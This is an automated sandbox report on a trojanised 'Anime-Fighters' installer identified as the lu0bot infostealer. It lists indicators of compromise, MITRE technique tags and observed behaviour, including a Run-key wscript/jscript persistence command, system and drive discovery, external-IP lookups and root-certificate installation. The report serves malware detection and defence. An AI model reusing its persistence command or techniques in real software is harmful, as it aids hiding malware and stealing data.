lu0bot | c91c6c4c1162115c8d7f82f2d9f4098ee61fbe9051d3350b0a2f97fa2ce3e6f2

Resubmissions

02-09-2021 19:12

210902-xwla1aeefq 10

02-09-2021 19:09

210902-xtsbjabea9 8

Analysis

max time kernel
599s
max time network
644s
platform
windows7_x64
resource
win7v20210408
submitted
02-09-2021 19:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Anime-Fighters-Infin_734316524.exe
Size

3.9MB
MD5

bd2b73492acf20dec004360b1605032d
SHA1

60ddf3c107d94bbeb102a2d7ede945eb5edd2b35
SHA256

12b6272825140a15eabec58f97b49aed3ce5db7816a0b3c2674f6ae8746367ca
SHA512

dae236259e32a9e4b789f020dbd8082b376e3c2b56fd94523a44cf4b5a557f3661aeefc24b5605218ba0479ee1b9a8cb7b5c1df6c103673a99f13bc4210c90da

Score

10^/10

lu0bot discovery persistence stealer suricata trojan

Malware Config

Signatures

Lu0bot
Lu0bot is a lightweight infostealer written in NodeJS.
trojan stealer lu0bot
suricata: ET MALWARE lu0bot Loader HTTP Request
suricata: ET MALWARE lu0bot Loader HTTP Request
suricata
suricata: ET MALWARE lu0bot Loader HTTP Response
suricata: ET MALWARE lu0bot Loader HTTP Response
suricata

Blocklisted process makes network request 64 IoCs

flow	pid	Process
31	288	MsiExec.exe
34	288	MsiExec.exe
35	996	mshta.exe
36	288	MsiExec.exe
37	2180	cscript.exe
39	288	MsiExec.exe
41	288	MsiExec.exe
43	288	MsiExec.exe
45	288	MsiExec.exe
46	288	MsiExec.exe
47	288	MsiExec.exe
48	288	MsiExec.exe
49	288	MsiExec.exe
50	288	MsiExec.exe
54	288	MsiExec.exe
55	288	MsiExec.exe
56	288	MsiExec.exe
57	288	MsiExec.exe
58	288	MsiExec.exe
59	288	MsiExec.exe
60	288	MsiExec.exe
61	288	MsiExec.exe
62	288	MsiExec.exe
64	288	MsiExec.exe
65	288	MsiExec.exe
68	288	MsiExec.exe
69	288	MsiExec.exe
72	288	MsiExec.exe
73	288	MsiExec.exe
77	288	MsiExec.exe
80	288	MsiExec.exe
81	288	MsiExec.exe
82	288	MsiExec.exe
83	288	MsiExec.exe
84	288	MsiExec.exe
85	288	MsiExec.exe
86	288	MsiExec.exe
87	288	MsiExec.exe
88	288	MsiExec.exe
89	288	MsiExec.exe
90	288	MsiExec.exe
91	288	MsiExec.exe
92	288	MsiExec.exe
93	288	MsiExec.exe
94	288	MsiExec.exe
95	288	MsiExec.exe
96	288	MsiExec.exe
97	288	MsiExec.exe
98	288	MsiExec.exe
99	288	MsiExec.exe
100	288	MsiExec.exe
101	288	MsiExec.exe
102	288	MsiExec.exe
103	288	MsiExec.exe
104	288	MsiExec.exe
105	288	MsiExec.exe
106	288	MsiExec.exe
107	288	MsiExec.exe
108	288	MsiExec.exe
109	288	MsiExec.exe
110	288	MsiExec.exe
111	288	MsiExec.exe
112	288	MsiExec.exe
113	288	MsiExec.exe

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

pid	Process
1864	Anime-Fighters-Infin_734316524.tmp
1748	Expedita.exe
1360	4k3pJuomY9ufA5v.exe
1268	5TbjRG.exe
1972	52225395540.exe
2436	node.exe
2656	26650786599.exe
2716	Garbage Cleaner.exe
3032	Garbage Cleaner.exe
544	AdvancedWindowsManager.exe
2588	AdvancedWindowsManager.exe
2620	AdvancedWindowsManager.exe
4044	AdvancedWindowsManager.exe
2152	AdvancedWindowsManager.exe
4220	AdvancedWindowsManager.exe

Loads dropped DLL 56 IoCs

pid	Process
1988	Anime-Fighters-Infin_734316524.exe
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1864	Anime-Fighters-Infin_734316524.tmp
1748	Expedita.exe
1748	Expedita.exe
1748	Expedita.exe
1268	5TbjRG.exe
1268	5TbjRG.exe
1268	5TbjRG.exe
1564	MsiExec.exe
1564	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
288	MsiExec.exe
1268	5TbjRG.exe
288	MsiExec.exe
288	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1648	MsiExec.exe
1384	cmd.exe
1648	MsiExec.exe
1384	cmd.exe
288	MsiExec.exe
2380	cscript.exe
2628	cmd.exe
2628	cmd.exe
2688	cmd.exe
1360	4k3pJuomY9ufA5v.exe
3032	Garbage Cleaner.exe
3032	Garbage Cleaner.exe
1584	taskeng.exe
1584	taskeng.exe
1584	taskeng.exe
1584	taskeng.exe
2572	Process not Found
1584	taskeng.exe
2064	Process not Found
1584	taskeng.exe
1384	Process not Found
1584	taskeng.exe
4188	Process not Found
1584	taskeng.exe
4212	Process not Found
4232	Process not Found

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2584	icacls.exe
6992	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Intel Management Engine Components 537220114 = "wscript.exe /t:30 /nologo /e:jscript \"C:\\ProgramData\\Intel\\Intel(R) Management Engine Components\\Intel MEC 1582787339\" \"C:\\ProgramData\\Intel\\Intel(R) Management Engine Components\" 1516268563"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	5TbjRG.exe
File opened (read-only)	\??\O:	5TbjRG.exe
File opened (read-only)	\??\T:	5TbjRG.exe
File opened (read-only)	\??\W:	5TbjRG.exe
File opened (read-only)	\??\R:	5TbjRG.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\E:	5TbjRG.exe
File opened (read-only)	\??\H:	5TbjRG.exe
File opened (read-only)	\??\I:	5TbjRG.exe
File opened (read-only)	\??\K:	5TbjRG.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	5TbjRG.exe
File opened (read-only)	\??\Q:	5TbjRG.exe
File opened (read-only)	\??\Y:	5TbjRG.exe
File opened (read-only)	\??\Z:	5TbjRG.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	5TbjRG.exe
File opened (read-only)	\??\U:	5TbjRG.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	5TbjRG.exe
File opened (read-only)	\??\P:	5TbjRG.exe
File opened (read-only)	\??\S:	5TbjRG.exe
File opened (read-only)	\??\V:	5TbjRG.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	5TbjRG.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	5TbjRG.exe
File opened (read-only)	\??\L:	5TbjRG.exe
File opened (read-only)	\??\N:	5TbjRG.exe
File opened (read-only)	\??\X:	5TbjRG.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
480	ipinfo.io
140	whatismyip.akamai.com
190	ipinfo.io
198	ip-api.com
215	ip-api.com
217	ip-api.com
253	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2716 set thread context of 3032	2716	Garbage Cleaner.exe	74

Drops file in Program Files directory 22 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Vel\unins000.dat	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\voluptas\is-5AFS5.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\Vel\unins000.dat	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\Vel\is-239LL.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-L58BB.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-DRN7E.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-2OJN4.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\Vel\voluptas\is-U45I1.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files (x86)\Vel\is-VQFME.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-6D7AM.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\magnam\is-PLL4J.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-JJ4LS.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-82E0O.tmp	Anime-Fighters-Infin_734316524.tmp
File opened for modification	C:\Program Files (x86)\Vel\magnam\Expedita.exe	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\is-J0CFU.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\Vel\nesciunt\is-9TBDE.tmp	Anime-Fighters-Infin_734316524.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe

Drops file in Windows directory 32 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI2850.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC16.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\f760437.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI24D2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f760437.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC74.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID40.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1418.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Installer\MSI81E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1139.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI12C0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI21C3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2540.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI25DD.tmp	msiexec.exe
File created	C:\Windows\Installer\f760439.msi	msiexec.exe
File created	C:\Windows\Installer\f760435.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB59.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Installer\MSIDAE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI267A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2406.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\f760435.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI204A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI203A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2359.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF26.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	26650786599.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	26650786599.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	node.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2164	tasklist.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2360	netstat.exe
1608	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2212	systeminfo.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
1892	taskkill.exe
2784	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
7056	reg.exe
7068	reg.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Expedita.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Expedita.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	5TbjRG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	5TbjRG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Garbage Cleaner.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	5TbjRG.exe
